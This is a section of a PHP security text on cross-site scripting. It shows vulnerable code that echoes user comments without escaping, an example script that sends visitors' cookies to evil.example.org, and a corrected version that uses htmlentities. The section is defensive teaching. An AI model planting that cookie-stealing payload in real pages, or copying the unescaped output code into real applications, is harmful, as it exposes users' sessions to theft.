Section 2.4. Cross-Site Scripting
2.4. Cross-Site ScriptingCross-site scripting (XSS) is deservedly one of the best known types of attacks. It plagues web applications on all platforms, and PHP applications are certainly no exception. Any application that displays input is at riskweb-based email applications, forums, guestbooks, and even blog aggregators. In fact, most web applications display input of some typethis is what makes them interesting, but it is also what places them at risk. If this input is not properly filtered and escaped, a cross-site scripting vulnerability exists. Consider a web application that allows users to enter comments on each page. The following form can be used to facilitate this: <form action="comment.php" method="POST" /> <p>Name: <input type="text" name="name" /><br /> Comment: <textarea name="comment" rows="10" cols="60"></textarea><br /> <input type="submit" value="Add Comment" /></p> </form> The application displays comments to other users who visit the page. For example, code similar to the following can be used to output a single comment ($comment) and corresponding name ($name): <?php echo "<p>$name writes:<br />"; echo "<blockquote>$comment</blockquote></p>"; ?> This approach places a significant amount of trust in the values of both $comment and $name. Imagine that one of them contained the following: <script> document.location = 'http://evil.example.org/steal.php?cookies=' + document.cookie </script> If this comment is sent to your users, it is no different than if you had allowed someone else to add this bit of JavaScript to your source. Your users will involuntarily send their cookies (the ones associated with your application) to evil.example.org, and the receiving script (steal.php) can access all of the cookies in $_GET['cookies']. This is a common mistake, and it is proliferated by many bad habits that have become commonplace. Luckily, the mistake is easy to avoid. Because the risk exists only when you output tainted, unescaped data, you can simply make sure that you filter input and escape output as described in Chapter 1. At the very least, you should use htmlentities( ) to escape any data that you send to the clientthis function converts all special characters into their HTML entity equivalents. Thus, any character that the browser interprets in a special way is converted to its HTML entity equivalent so that its original value is preserved. The following replacement for the code to display a comment is a much safer approach: <?php $clean = array(); $html = array(); /* Filter Input ($name, $comment) */ $html['name'] = htmlentities($clean['name'], ENT_QUOTES, 'UTF-8'); $html['comment'] = htmlentities($clean['comment'], ENT_QUOTES, 'UTF-8'); echo "<p>{$html['name']} writes:<br />"; echo "<blockquote>{$html['comment']}</blockquote></p>"; ?> |
